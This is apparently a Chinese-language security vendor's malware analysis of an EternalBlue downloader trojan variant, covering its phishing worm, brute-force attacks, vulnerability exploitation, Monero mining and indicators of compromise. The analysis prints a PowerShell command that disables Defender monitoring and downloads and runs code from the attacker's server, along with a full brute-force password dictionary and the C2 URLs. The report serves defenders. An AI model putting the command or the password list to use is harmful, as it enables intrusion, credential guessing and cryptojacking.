一、背景

近期腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种的病毒延续上个版本的邮件蠕虫攻击方法，利用附带Office漏洞CVE-2017-8570漏洞的doc文档以及JS诱饵文件发送钓鱼邮件，同时新增了SMBGhost漏洞CVE-2020-0796机器的检测和上报、新增了SSH爆破攻击相关代码，推测其可能在后续攻击活动中利用SMBGhost漏洞、也可能发起针对Linux系统的攻击。

病毒Payload执行时安装随机名计划任务从新的C2地址t.zer9g.com、t.zz3r0.com下载a.jsp进行持久化攻击，a.jsp继续下载攻击模块if.bin、if_mail.bin以利用漏洞、爆破、钓鱼邮件等方法进行蠕虫式攻击，将XMRig矿机程序m6.bin、m6g.bin注入Powershell.exe运行。病毒还会安装没有实际功能的计划任务blackball（“黑球”），因此将此次攻击命名为“黑球”行动。

腾讯安全系列产品应对永恒之蓝下载器木马的响应清单：

更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

1.钓鱼邮件攻击

首先从outlook应用程序会话中获取邮箱联系人。

然后自动生成readme.doc，readme.js两种附件文件，并将readme.js制作为压缩包readme.zip。其中readme.doc中包含Office漏洞CVE-2017-8570触发代码。readme.js中包含恶意Wscript脚本攻击代码。两种附件被打开后都会执行恶意命令下载http[:]//d.ackng.com/mail.jsp。

在$mail.Body中添加待发送邮件的邮件主题内容，从预置的9个主题中随机选择，主要包含“新冠肺炎COVID-19”， “日常联系对话”， “文件损坏无法查看”三种类型，具体内容如下：

生成的钓鱼邮件示例如下：

最后针对邮箱中发现的每一个联系人，依次发送包含恶意代码的附件readme.doc、readme.zip的邮件。

2.弱口令爆破

RDP（3389端口）弱口令爆破，爆破用户名：“administrator”，密码字典：

"saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"。爆破成功后会上报该机器的IP以及此次成功登陆使用的密码，然后利用rdpexec模块远程执行代码$rdp_code:

cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionProcess c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe&powershell IEX(New-Object Net.WebClient).DownloadString(''http[:]//t.amynx.com/rdp.jsp'')

SMB爆破攻击（445端口），爆破使用用户名为"administrator","admin"，爆破成功后远程执行代码$ipc_code：

MSSQL爆破攻击（1433端口），使用与RDP爆破同样的密码字典，爆破成功后远程执行代码$mscmd_code：

此外，最新的攻击代码中还加如了SSH爆破相关命令，该代码将会启动SSH爆破模块，并在爆破成功后执行远程命令$ssh_cmd。但是目前该功能并未启用，相关可能还在开发阶段，后续如果启用之后，可能会导致被感染的Windows机器通过SSH爆破攻击Linux系统。

3.漏洞攻击

永恒之蓝下载器木马变种还会利用公开的漏洞检测代码检测存在SMBGhost漏洞CVE-2020-0796的机器IP并上报。

2020年3月12日腾讯安全威胁情报中心发布了SMBv3远程代码执行漏洞CVE-2020-0796（别名：SMBGhost，绰号：永恒之黑）预警公告：

https://mp.weixin.qq.com/s/zwuDziMherWbUY2S2rrD8Q

2020年6月2日，国外安全研究员公开了一份SMBGhost漏洞CVE-2020-0796漏洞的RCE代码，腾讯安全团队已对其进行分析并预警：

https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

该漏洞的后果十分接近永恒之蓝系列，都利用Windows SMB漏洞远程攻击获取系统最高权限，除了直接攻击SMB服务端造成RCE外，攻击者可以构造特定的网页，压缩包，共享目录，OFFICE文档等多种方式触发漏洞进行攻击。由于漏洞利用源代码被公布，使得漏洞利用风险骤然升级，被黑灰产修改即可用于网络攻击。

利用永恒之蓝漏洞攻击，攻击后远程执行代码$sc_code。

Lnk漏洞利用CVE-2017-8464，在可移动盘、网络磁盘下创建具有CVE-2017-8464漏洞攻击代码的Lnk文件，一旦该文件被查看就会导致恶意代码执行。同时还会释放JS文件readme.js，通过伪装的文件在被误点击时感染病毒。

4.清除竞品挖矿木马

永恒之蓝下载器木马在攻击代码if.bin中Killer()函数中会详细地搜集大量竞争对手挖矿木马的信息，包括各类挖矿木马安装的服务、计划任务、进程名，以及挖矿使用的命令行特点、端口号特点来锁定目标并进行清除。

通过服务名匹配：

$SrvName ="xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"

通过计划任务名匹配：

$TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for  products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"

通过命令行特征匹配：

$_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*'

通过网络端口匹配：

($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":3333") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))

通过进程名匹配：

$Miner ="SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost",
"SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"

5.执行Payload

通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码：

http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp

mail.jsp更新C2地址为：t.amynx.com、t.zer9g.com、t.zz3r0.com，并且安装计划任务blackball（“黑球”），该计划任务无实际代码执行。

然后mail.jsp安装一个三个随机名计划任务（分别为<random>、<random>\<random>、MicroSoft\Windows\<random>），执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com /a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。

a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin，并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行，连接矿池lplp.ackng.com:443挖矿，导致CPU占用率接近100%。

将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2，即不对outlook任何可疑活动进行提示。

然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin，获取邮箱所有联系人，依次发送钓鱼邮件，进入下一轮攻击流程。

6.历次版本

根据腾讯安全威胁情报中心持续跟踪结果，永恒之蓝下载器病毒2018~2020历次变化情况如下：

三、IOCs

Domain

t.amynx.com

t.zer9g.com

t.zz3r0.com

d.ackng.com

URL：

http[:]//d.ackng.com/if_mail.bin

http[:]//d.ackng.com/if.bin

http[:]//t.zer9g.com/a.jsp

http[:]//t.zz3r0.com/a.jsp

http[:]//t.amynx.com/mail.jsp

md5

if.bin e5ae6d154a6befc00deea0ccb49dc9b8

if_mail.bin 88949e6a329c6b2796ddcc81564cee1a

a.jsp e3687c56b8be535398051405f8221d82

usb.jsp 7805776504e8a39c2a892d89e2492c12

mail.jsp cc67b69740c7bd0744acd3242729ce15

参考链接：

“来自“蓝茶”的问候：“你是不是疯了”，暗藏新攻击手法”

https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q

“SMBGhost漏洞（CVE-2020-0796）利用源码公开，安全风险骤然升级”

https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！